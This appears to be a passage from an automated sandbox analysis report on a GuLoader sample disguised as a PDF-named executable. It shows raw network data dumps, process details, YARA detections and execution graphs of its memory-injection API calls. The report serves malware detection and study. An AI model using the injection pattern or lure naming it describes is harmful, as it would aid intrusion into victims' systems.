86 07 d9 c1 80 92 f8 35 6b a7 fd 6d 74 70 10 84 29 a1 fa 9d 9b ec 24 59 9d 5c fe e7 82 1b b5 e5 5a 9f ed 64 4d ae e7 3e 01 e3 28 a3 1f ae 85 17 f6 7a 7a 49 d4 2d 7f 23 42 e5 9a 24 c4 a3 2d 00 f8 af 6d 81 57 de 41 ce 1c b4
                            Data Ascii: siXf_v9I*!}g!36kS}[-*(8l%!7?eeyYx!5o]C6cfYS(b[)5 utD1E;J(_=eHM<GdJR5kmtp)$Y\ZdM>(zzI-#B$-mWA
                            2021-12-01 10:57:39 UTC107INData Raw: 09 14 78 13 55 79 0d 4d 6a 68 fc d6 35 a7 1f c8 fd 2a fd b8 fc c7 c6 e4 df 5e 90 7a dc 45 52 7a 98 ad 99 0f 39 5f 3c 8b 99 72 4f 27 3d 95 34 4a 69 30 a1 2f dd 79 ce a0 67 34 14 21 2f 49 2d 87 71 77 b8 14 0d 8c a6 10 98 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f 11 dd 4c e7 63 15 3b e1 71 cf e6 22 cb 0f 2c 29 4e 2b ca 81 e7 e4 7c 9b 9e 06 dd 08 59 50 99 f1 01 51 09 84 35 94 b1 c6 11 7b 7c 0f 98 37 82 36 c9 5d b9 00 d0 e5 75 71 fd ff 59 47 ee 8e 1b b8 ce f5 74 66 11 fa 31 32 01 3d bf 85 75 f3 49 7f f7 92 37 63 13 1b 06 d9 f6
                            Data Ascii: xUyMjh5*^zERz9_<rO'=4Ji0/yg4!/I-qwW}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/Lc;q",)N+|YPQ5{|76]uqYGtf12=uI7c
                            2021-12-01 10:57:39 UTC108INData Raw: 28 38 96 6c bc 25 21 37 a3 f2 ce f8 3f 8f e6 65 65 d9 79 59 d3 92 78 0d 21 84 e9 e5 35 82 9c af 6f cd 5d 43 36 d4 63 8e 12 89 66 59 bc 53 28 c3 89 62 5b 29 d3 35 20 a3 95 a8 75 97 74 44 31 f7 45 3b 4a 0f 8d 04 f9 c5 bb 28 5f 0b a7 9b 85 a0 3d 00 0f b8 65 9e 48 ee a3 e0 c9 d1 d8 e1 4d 14 3c 47 c5 c3 64 f5 fa c0 4a 52 f0 f0 86 07 d9 c1 80 92 f8 35 6b a7 fd 6d 74 70 10 84 29 a1 fa 9d 9b ec 24 59 9d 5c fe e7 82 1b b5 e5 5a 9f ed 64 4d ae e7 3e 01 e3 28 a3 1f ae 85 17 f6 7a 7a 49 d4 2d 7f 23 42 e5 9a 24 c4 a3 2d 00 f8 af 6d 81 57 de 41 ce 1c b4 57 25 b4 59 7d a0 f6 e2 df f3 f5 80 4b 60 7c 05 d2 ac 8d d7 2c 8d 41 73 0f f9 b5 fc 41 23 b2 32 dc d6 24 93 58 1f 9a 62 80 4f a8 17 c8 00 2c e6 b2 a8 80 a5 69 fe 4a c4 b4 3f 97 84 66 da 3c 0c 16 b3 d7 de 54 1d f8 e1 07
                            Data Ascii: (8l%!7?eeyYx!5o]C6cfYS(b[)5 utD1E;J(_=eHM<GdJR5kmtp)$Y\ZdM>(zzI-#B$-mWAW%Y}K`|,AsA#2$XbO,iJ?f<T
                            2021-12-01 10:57:39 UTC109INData Raw: 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f 11 dd 4c e7 63 15 3b e1 71 cf e6 22 cb 0f 2c 29 4e 2b ca 81 e7 e4 7c 9b 9e 06 dd 08 59 50 99 f1 01 51 09 84 35 94 b1 c6 11 7b 7c 0f 98 37 82 36 c9 5d b9 00 d0 e5 75 71 fd ff 59 47 ee 8e 1b b8 ce f5 74 66 11 fa 31 32 01 3d bf 85 75 f3 49 7f f7 92 37 63 13 1b 06 d9 f6 51 2d 10 dc 9f d5 32 dc 83 3f ef 49 62 0b 4b cc b1 17 ae 66 dc 5f b9 dd 49 0e 59 ac d3 13 9f c4 31 9b 54 83 89 23 e4 b0 af cb 39 94 3f 8b 51 79 48 d1 51 9e 8a c1 f0 b5 22 b8 17 8d 2d 2b 92 ba ae b8 73 91 c6 dc 95 6e c6
                            Data Ascii: W}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/Lc;q",)N+|YPQ5{|76]uqYGtf12=uI7cQ-2?IbKf_IY1T#9?QyHQ"-+sn


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: RFQ 001030112021#U00b7pdf.exe PID: 4692 Parent PID: 5156

                            General

                            Start time:11:56:09
                            Start date:01/12/2021
                            Path:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
                            Imagebase:0x400000
                            File size:115848 bytes
                            MD5 hash:754FA9FF30EC6E1CD7A29837ADEB7A8B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Visual Basic
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            Chronological Activities

                            Analysis Process: RFQ 001030112021#U00b7pdf.exe PID: 7156 Parent PID: 4692

                            General

                            Start time:11:56:55
                            Start date:01/12/2021
                            Path:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
                            Imagebase:0x400000
                            File size:115848 bytes
                            MD5 hash:754FA9FF30EC6E1CD7A29837ADEB7A8B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            Chronological Activities

                            Disassembly

                            Code Analysis

                            Reset < >

                              Analysis Process: RFQ 001030112021#U00b7pdf.exe PID: 4692 Parent PID: 5156 RFQ 001030112021#U00b7pdf.exeCOMMON

                              Execution Graph

                              Execution Coverage:3.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:66.5%
                              Total number of Nodes:251
                              Total number of Limit Nodes:34

                              Graph

                              execution_graph 22034 20ba6b9 22037 20bc335 22034->22037 22036 20ba6c4 LdrInitializeThunk 22038 20bc367 22037->22038 22039 20b0d6d EnumWindows 22040 20b0d38 EnumWindows 22039->22040 22043 20b0da8 22039->22043 22040->22043 22042 20bfc31 22043->22042 22045 20b7857 22043->22045 22048 20bbb68 22043->22048 22082 20bdb82 22043->22082 22101 20bbaa1 GetPEB 22045->22101 22049 20bbce5 LoadLibraryA 22048->22049 22105 20bc7bf GetPEB 22048->22105 22053 20bbced 22049->22053 22052 20b7ac5 22054 20b8aed 22052->22054 22055 20bbae2 11 API calls 22052->22055 22056 20bef3c 11 API calls 22054->22056 22058 20b7b37 22055->22058 22059 20b8b03 22056->22059 22057 20bbca4 22057->22049 22062 20bef3c 11 API calls 22058->22062 22060 20bef3c 11 API calls 22059->22060 22061 20b8b13 22060->22061 22063 20bef3c 11 API calls 22061->22063 22065 20b7ba9 22062->22065 22064 20b8b78 22063->22064 22066 20bef3c 11 API calls 22065->22066 22067 20b7fe2 22066->22067 22067->22054 22068 20b0e9a 22067->22068 22069 20bef3c 11 API calls 22067->22069 22070 20b818e 22069->22070 22070->22054 22071 20bef3c 11 API calls 22070->22071 22072 20b846d 22071->22072 22072->22054 22073 20b8881 NtWriteVirtualMemory 22072->22073 22073->22054 22074 20b88d5 22073->22074 22075 20bef3c 11 API calls 22074->22075 22076 20b8980 22075->22076 22076->22054 22077 20bef3c 11 API calls 22076->22077 22078 20b8a23 22077->22078 22078->22054 22079 20b8a7f 22078->22079 22080 20bef3c 11 API calls 22079->22080 22081 20b8aec 22080->22081 22083 20bdbbc 22082->22083 22107 20bbae2 22083->22107 22085 20bdbc7 22086 20bbae2 10 API calls 22085->22086 22087 20bdc0c 22086->22087 22088 20bdcc1 GetPEB 22087->22088 22148 20bea59 22088->22148 22090 20be4cf 22090->22043 22091 20bdd20 22091->22090 22092 20be4d5 22091->22092 22100 20be033 22091->22100 22095 20be5cd 22092->22095 22098 20be7ea 22092->22098 22093 20bea59 10 API calls 22094 20bea56 22093->22094 22094->22043 22096 20bea59 10 API calls 22095->22096 22097 20be7e7 22096->22097 22097->22043 22098->22093 22099 20bea59 10 API calls 22099->22090 22100->22099 22102 20b7a52 22101->22102 22103 20bef3c 22102->22103 22192 20bef41 22103->22192 22106 20bc7d1 22105->22106 22106->22057 22107->22085 22114 20b0ebf 22107->22114 22108 20bbb68 22109 20bbce5 LoadLibraryA 22108->22109 22110 20bc7bf GetPEB 22108->22110 22111 20bbced 22109->22111 22112 20bbca4 22110->22112 22111->22085 22112->22109 22113 20bfc31 22113->22085 22114->22107 22114->22108 22114->22113 22115 20bdb82 9 API calls 22114->22115 22116 20b7857 22114->22116 22115->22114 22117 20bbaa1 GetPEB 22116->22117 22118 20b7a52 22117->22118 22119 20bef3c 9 API calls 22118->22119 22120 20b7ac5 22119->22120 22121 20b8aed 22120->22121 22122 20bbae2 9 API calls 22120->22122 22123 20bef3c 9 API calls 22121->22123 22124 20b7b37 22122->22124 22125 20b8b03 22123->22125 22128 20bef3c 9 API calls 22124->22128 22126 20bef3c 9 API calls 22125->22126 22127 20b8b13 22126->22127 22129 20bef3c 9 API calls 22127->22129 22131 20b7ba9 22128->22131 22130 20b8b78 22129->22130 22130->22085 22132 20bef3c 9 API calls 22131->22132 22133 20b7fe2 22132->22133 22133->22121 22134 20b0e9a 22133->22134 22135 20bef3c 9 API calls 22133->22135 22134->22085 22136 20b818e 22135->22136 22136->22121 22137 20bef3c 9 API calls 22136->22137 22138 20b846d 22137->22138 22138->22121 22139 20b8881 NtWriteVirtualMemory 22138->22139 22139->22121 22140 20b88d5 22139->22140 22141 20bef3c 9 API calls 22140->22141 22142 20b8980 22141->22142 22142->22121 22143 20bef3c 9 API calls 22142->22143 22144 20b8a23 22143->22144 22144->22121 22145 20b8a7f 22144->22145 22146 20bef3c 9 API calls 22145->22146 22147 20b8aec 22146->22147 22147->22085 22149 20beac2 22148->22149 22150 20beb3d NtProtectVirtualMemory 22149->22150 22152 20b0ebf 22149->22152 22150->22091 22152->22091 22153 20bfc31 22152->22153 22154 20bdb82 8 API calls 22152->22154 22155 20b7857 22152->22155 22158 20bbb68 22152->22158 22153->22091 22154->22152 22156 20bbaa1 GetPEB 22155->22156 22157 20b7a52 22156->22157 22160 20bef3c 8 API calls 22157->22160 22159 20bbce5 LoadLibraryA 22158->22159 22161 20bc7bf GetPEB 22158->22161 22163 20bbced 22159->22163 22162 20b7ac5 22160->22162 22167 20bbca4 22161->22167 22164 20b8aed 22162->22164 22165 20bbae2 8 API calls 22162->22165 22163->22091 22166 20bef3c 8 API calls 22164->22166 22168 20b7b37 22165->22168 22169 20b8b03 22166->22169 22167->22159 22172 20bef3c 8 API calls 22168->22172 22170 20bef3c 8 API calls 22169->22170 22171 20b8b13 22170->22171 22173 20bef3c 8 API calls 22171->22173 22175 20b7ba9 22172->22175 22174 20b8b78 22173->22174 22174->22091 22176 20bef3c 8 API calls 22175->22176 22177 20b7fe2 22176->22177 22177->22164 22178 20b0e9a 22177->22178 22179 20bef3c 8 API calls 22177->22179 22178->22091 22180 20b818e 22179->22180 22180->22164 22181 20bef3c 8 API calls 22180->22181 22182 20b846d 22181->22182 22182->22164 22183 20b8881 NtWriteVirtualMemory 22182->22183 22183->22164 22184 20b88d5 22183->22184 22185 20bef3c 8 API calls 22184->22185 22186 20b8980 22185->22186 22186->22164 22187 20bef3c 8 API calls 22186->22187 22188 20b8a23 22187->22188 22188->22164 22189 20b8a7f 22188->22189 22190 20bef3c 8 API calls 22189->22190 22191 20b8aec 22190->22191 22191->22091 22193 20bef7d 22192->22193 22238 20bd0c6 22193->22238 22195 20bf118 22201 20bf526 22195->22201 22204 20b0ebf 22195->22204 22196 20bf784 22197 20bbb68 22198 20bbce5 LoadLibraryA 22197->22198 22199 20bc7bf GetPEB 22197->22199 22200 20bbced 22198->22200 22202 20bbca4 22199->22202 22201->22196 22203 20bf776 NtOpenFile 22201->22203 22202->22198 22203->22196 22204->22196 22204->22197 22205 20bdb82 8 API calls 22204->22205 22206 20b7857 22204->22206 22205->22204 22207 20bbaa1 GetPEB 22206->22207 22208 20b7a52 22207->22208 22209 20bef3c 8 API calls 22208->22209 22210 20b7ac5 22209->22210 22211 20b8aed 22210->22211 22212 20bbae2 8 API calls 22210->22212 22213 20bef3c 8 API calls 22211->22213 22214 20b7b37 22212->22214 22215 20b8b03 22213->22215 22218 20bef3c 8 API calls 22214->22218 22216 20bef3c 8 API calls 22215->22216 22217 20b8b13 22216->22217 22219 20bef3c 8 API calls 22217->22219 22221 20b7ba9 22218->22221 22220 20b8b78 22219->22220 22222 20bef3c 8 API calls 22221->22222 22223 20b7fe2 22222->22223 22223->22211 22224 20b0e9a 22223->22224 22225 20bef3c 8 API calls 22223->22225 22226 20b818e 22225->22226 22226->22211 22227 20bef3c 8 API calls 22226->22227 22228 20b846d 22227->22228 22228->22211 22229 20b8881 NtWriteVirtualMemory 22228->22229 22229->22211 22230 20b88d5 22229->22230 22231 20bef3c 8 API calls 22230->22231 22232 20b8980 22231->22232 22232->22211 22233 20bef3c 8 API calls 22232->22233 22234 20b8a23 22233->22234 22234->22211 22235 20b8a7f 22234->22235 22236 20bef3c 8 API calls 22235->22236 22237 20b8aec 22236->22237 22239 20bc7bf GetPEB 22238->22239 22240 20bd0d3 22239->22240 22240->22195 22241 20b9241 22242 20b923b CreateFileA 22241->22242 22244 20b8e31 22245 20b8eac TerminateProcess 22244->22245 22247 20b8f4f 22245->22247 22249 20b0ebf 22245->22249 22248 20bdb82 11 API calls 22248->22249 22249->22247 22249->22248 22250 20b7857 22249->22250 22253 20bbb68 22249->22253 22251 20bbaa1 GetPEB 22250->22251 22252 20b7a52 22251->22252 22255 20bef3c 11 API calls 22252->22255 22254 20bbce5 LoadLibraryA 22253->22254 22256 20bc7bf GetPEB 22253->22256 22258 20bbced 22254->22258 22257 20b7ac5 22255->22257 22262 20bbca4 22256->22262 22259 20b8aed 22257->22259 22260 20bbae2 11 API calls 22257->22260 22261 20bef3c 11 API calls 22259->22261 22263 20b7b37 22260->22263 22264 20b8b03 22261->22264 22262->22254 22267 20bef3c 11 API calls 22263->22267 22265 20bef3c 11 API calls 22264->22265 22266 20b8b13 22265->22266 22268 20bef3c 11 API calls 22266->22268 22270 20b7ba9 22267->22270 22269 20b8b78 22268->22269 22271 20bef3c 11 API calls 22270->22271 22272 20b7fe2 22271->22272 22272->22259 22273 20b0e9a 22272->22273 22274 20bef3c 11 API calls 22272->22274 22275 20b818e 22274->22275 22275->22259 22276 20bef3c 11 API calls 22275->22276 22277 20b846d 22276->22277 22277->22259 22278 20b8881 NtWriteVirtualMemory 22277->22278 22278->22259 22279 20b88d5 22278->22279 22280 20bef3c 11 API calls 22279->22280 22281 20b8980 22280->22281 22281->22259 22282 20bef3c 11 API calls 22281->22282 22283 20b8a23 22282->22283 22283->22259 22284 20b8a7f 22283->22284 22285 20bef3c 11 API calls 22284->22285 22286 20b8aec 22285->22286 22287 40131c 22288 401320 #100 22287->22288 22289 401348 22288->22289 22289->22288 22290 401386 22289->22290 22291 20b9685 22292 20b9700 NtAllocateVirtualMemory 22291->22292 22293 20b976a 22292->22293 22294 20b1a15 22295 20b19ad 22294->22295 22296 20b1a27 22294->22296 22297 20bbae2 11 API calls 22296->22297 22298 20b1ab1 22296->22298 22297->22298

                              Executed Functions

                              Function 020B2725, Relevance: 11.3, APIs: 2, Strings: 4, Instructions: 789COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 20b2725-20b27b1 3 20b27bb-20b2814 call 20b7568 0->3 7 20b285a-20b2868 3->7 8 20b2816-20b2858 3->8 7->3 11 20b286e-20b2884 7->11 8->7 14 20b288a-20b28f1 call 20b4386 call 20bb969 11->14 15 20b2a04-20b8f49 TerminateProcess 11->15 14->15 22 20b7568-20b7708 call 20b765f 15->22 23 20b8f4f-20b8f51 15->23 25 20bfc31-20bfc35 22->25 39 20b770e-20b783a call 20b778b call 20bdb82 22->39 23->25 29 20bfc36-20bfc57 25->29 29->29 31 20bfc59-20bfc5b 29->31 49 20b0ebf-20b0f36 39->49 50 20b7840-20b7851 39->50 62 20b0fb0-20b0fb7 49->62 52 20bbae2-20bbb62 50->52 53 20b7857-20b7b24 call 20bbaa1 call 20bef3c 50->53 52->49 60 20bbb68-20bbc98 call 20bbc52 52->60 87 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 53->87 88 20b8aed-20b8bb6 call 20bef3c * 3 53->88 77 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 60->77 78 20bbce5-20bbd25 LoadLibraryA call 20bbd26 60->78 66 20b0fb9-20b0fba 62->66 67 20b0faf 62->67 66->22 67->62 77->78 87->88 129 20b8049-20b806e 87->129 130 20b0e9a-20b0ebc call 20b0d1f 129->130 131 20b8074-20b81f0 call 20bef3c 129->131 131->88 143 20b81f6-20b8494 call 20bef3c 131->143 143->88 153 20b849a-20b84f9 143->153 153->88 155 20b84ff-20b8564 153->155 157 20b8566-20b858b 155->157 158 20b85c5-20b85dc 155->158 157->88 159 20b8591-20b85c3 157->159 158->88 160 20b85e2-20b87d1 call 20bc330 158->160 159->158 160->88 171 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 160->171 171->88 176 20b88d5-20b89b4 call 20bef3c 171->176 176->88 182 20b89ba-20b8a7d call 20bef3c 176->182 182->88 187 20b8a7f-20b8aec call 20bef3c 182->187
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !5]$DHcL$i"m$k,I5
                              • API String ID: 0-1191262246
                              • Opcode ID: 96e80fc2866cda34281e6678aa3a3c4d3cfc5150ffd61da4bdcf9f5263b37ece
                              • Instruction ID: ca9432b3cf04a64f31332ff53eb4fd183751ff4ab88186715d6a29dc6f609da6
                              • Opcode Fuzzy Hash: 96e80fc2866cda34281e6678aa3a3c4d3cfc5150ffd61da4bdcf9f5263b37ece
                              • Instruction Fuzzy Hash: 7762FFB2604349DFDB759F29CD947EABBB2FF95300F15811ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BEA59, Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 786nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 191 20bea59-20beb37 194 20b7568-20b7708 call 20b765f 191->194 195 20beb3d-20beb7c NtProtectVirtualMemory 191->195 206 20b770e-20b783a call 20b778b call 20bdb82 194->206 207 20bfc31-20bfc35 194->207 219 20b0ebf-20b0f36 206->219 220 20b7840-20b7851 206->220 209 20bfc36-20bfc57 207->209 209->209 211 20bfc59-20bfc5b 209->211 232 20b0fb0-20b0fb7 219->232 222 20bbae2-20bbb62 220->222 223 20b7857-20b7b24 call 20bbaa1 call 20bef3c 220->223 222->219 230 20bbb68-20bbc98 call 20bbc52 222->230 257 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 223->257 258 20b8aed-20b8bb6 call 20bef3c * 3 223->258 247 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 230->247 248 20bbce5-20bbce8 LoadLibraryA call 20bbd26 230->248 236 20b0fb9-20b0fba 232->236 237 20b0faf 232->237 236->194 237->232 247->248 255 20bbced-20bbd25 248->255 257->258 299 20b8049-20b806e 257->299 300 20b0e9a-20b0ebc call 20b0d1f 299->300 301 20b8074-20b81f0 call 20bef3c 299->301 301->258 313 20b81f6-20b8494 call 20bef3c 301->313 313->258 323 20b849a-20b84f9 313->323 323->258 325 20b84ff-20b8564 323->325 327 20b8566-20b858b 325->327 328 20b85c5-20b85dc 325->328 327->258 329 20b8591-20b85c3 327->329 328->258 330 20b85e2-20b87d1 call 20bc330 328->330 329->328 330->258 341 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 330->341 341->258 346 20b88d5-20b89b4 call 20bef3c 341->346 346->258 352 20b89ba-20b8a7d call 20bef3c 346->352 352->258 357 20b8a7f-20b8aec call 20bef3c 352->357
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000B6,?,?,?,?,020BDD20), ref: 020BEB7A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 2706961497-2585089168
                              • Opcode ID: 803da07c64ff71d32f15a39f48333c16e07bae84ee3e0416ff8398ba6568e068
                              • Instruction ID: f360afbfcbb0e9d9d9db96f6f9aff64f6d9bc33d62b9f1a6fd87d051d07d4738
                              • Opcode Fuzzy Hash: 803da07c64ff71d32f15a39f48333c16e07bae84ee3e0416ff8398ba6568e068
                              • Instruction Fuzzy Hash: 0272FEB2604349DFDB759F28CC847EABBB6FF95310F55811ADC899B224D3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8CFB, Relevance: 9.5, APIs: 1, Strings: 4, Instructions: 774COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 361 20b8cfb-20b8d83 363 20b8df6-20b8e59 361->363 364 20b8d85-20bac1f call 20b9502 call 20bafc9 call 20b8df4 call 20b8c49 361->364 368 20b0e9a-20b0ebc call 20b0d1f 363->368 369 20b8e5f-20b8e6f call 20b9502 363->369 378 20b7568-20b7708 call 20b765f 369->378 379 20b8e75-20b8e9e call 20bafc9 369->379 399 20b770e-20b783a call 20b778b call 20bdb82 378->399 400 20bfc31-20bfc35 378->400 412 20b0ebf-20b0f36 399->412 413 20b7840-20b7851 399->413 402 20bfc36-20bfc57 400->402 402->402 404 20bfc59-20bfc5b 402->404 425 20b0fb0-20b0fb7 412->425 415 20bbae2-20bbb62 413->415 416 20b7857-20b7b24 call 20bbaa1 call 20bef3c 413->416 415->412 423 20bbb68-20bbc98 call 20bbc52 415->423 450 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 416->450 451 20b8aed-20b8bb6 call 20bef3c * 3 416->451 440 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 423->440 441 20bbce5-20bbd25 LoadLibraryA call 20bbd26 423->441 429 20b0fb9-20b0fba 425->429 430 20b0faf 425->430 429->378 430->425 440->441 450->451 492 20b8049-20b806e 450->492 492->368 493 20b8074-20b81f0 call 20bef3c 492->493 493->451 502 20b81f6-20b8494 call 20bef3c 493->502 502->451 512 20b849a-20b84f9 502->512 512->451 514 20b84ff-20b8564 512->514 516 20b8566-20b858b 514->516 517 20b85c5-20b85dc 514->517 516->451 518 20b8591-20b85c3 516->518 517->451 519 20b85e2-20b87d1 call 20bc330 517->519 518->517 519->451 530 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 519->530 530->451 535 20b88d5-20b89b4 call 20bef3c 530->535 535->451 541 20b89ba-20b8a7d call 20bef3c 535->541 541->451 546 20b8a7f-20b8aec call 20bef3c 541->546
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: DHcL$i"m$k,I5$ystemRoot\System32\DRIVERS\srvnet.sys
                              • API String ID: 2167126740-1856495640
                              • Opcode ID: bc5dbe27f60a265f0e72b85bd8cbff86cb26086fe860c027cfe4aeef5837d612
                              • Instruction ID: 069fd761b747b96f60d1119da1dee0e19d66411aa4335eebc41972c53a7fbe02
                              • Opcode Fuzzy Hash: bc5dbe27f60a265f0e72b85bd8cbff86cb26086fe860c027cfe4aeef5837d612
                              • Instruction Fuzzy Hash: DB620F72604349DFDB759F29CD847DABBB6FF95310F55812ADC899B224C3308A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B74F1, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 696COMMON
                              Download Yara Rule

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: d161dd60d3aa6c58ceab7760c94ba79529b122ff0ba0066bdc7c0a96ede361ca
                              • Instruction ID: a7e19f21dc2edbc5e3bb57f251e8f268f4805e9117cd77ea9c5f803fc615d077
                              • Opcode Fuzzy Hash: d161dd60d3aa6c58ceab7760c94ba79529b122ff0ba0066bdc7c0a96ede361ca
                              • Instruction Fuzzy Hash: 2F52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7545, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 692COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 717 20b7545-20b75c6 719 20b7640 717->719 720 20b7607-20b760e 717->720 721 20b76b8-20b76ba 719->721 722 20b7642-20b7648 719->722 725 20b7688-20b76af 720->725 726 20b76e1-20b7708 721->726 727 20b7734-20b773a 721->727 722->720 724 20b764a-20b765a 722->724 724->725 725->726 728 20b770e-20b77b3 call 20b778b 726->728 729 20bfc31-20bfc35 726->729 730 20b77b4-20b783a call 20bdb82 727->730 728->730 735 20bfc36-20bfc57 729->735 743 20b0ebf-20b0f36 730->743 744 20b7840-20b7851 730->744 735->735 738 20bfc59-20bfc5b 735->738 756 20b0fb0-20b0fb7 743->756 746 20bbae2-20bbb62 744->746 747 20b7857-20b7b24 call 20bbaa1 call 20bef3c 744->747 746->743 754 20bbb68-20bbc98 call 20bbc52 746->754 788 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 747->788 789 20b8aed-20b8bb6 call 20bef3c * 3 747->789 776 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 754->776 777 20bbce5-20bbd25 LoadLibraryA call 20bbd26 754->777 760 20b0fb9-20b7687 call 20b765f 756->760 761 20b0faf 756->761 760->725 761->756 776->777 788->789 830 20b8049-20b806e 788->830 831 20b0e9a-20b0ebc call 20b0d1f 830->831 832 20b8074-20b81f0 call 20bef3c 830->832 832->789 844 20b81f6-20b8494 call 20bef3c 832->844 844->789 854 20b849a-20b84f9 844->854 854->789 856 20b84ff-20b8564 854->856 858 20b8566-20b858b 856->858 859 20b85c5-20b85dc 856->859 858->789 860 20b8591-20b85c3 858->860 859->789 861 20b85e2-20b87d1 call 20bc330 859->861 860->859 861->789 872 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 861->872 872->789 877 20b88d5-20b89b4 call 20bef3c 872->877 877->789 883 20b89ba-20b8a7d call 20bef3c 877->883 883->789 888 20b8a7f-20b8aec call 20bef3c 883->888
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 48f7733e41bc305b23fbf4e50574edbd11dfbd413ff67ea76fbdee8dfe611e2a
                              • Instruction ID: 114de8db5c5f97ff6ca33013507672ff44ed525b7be96cc8e7a68eca625b2942
                              • Opcode Fuzzy Hash: 48f7733e41bc305b23fbf4e50574edbd11dfbd413ff67ea76fbdee8dfe611e2a
                              • Instruction Fuzzy Hash: 3752FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
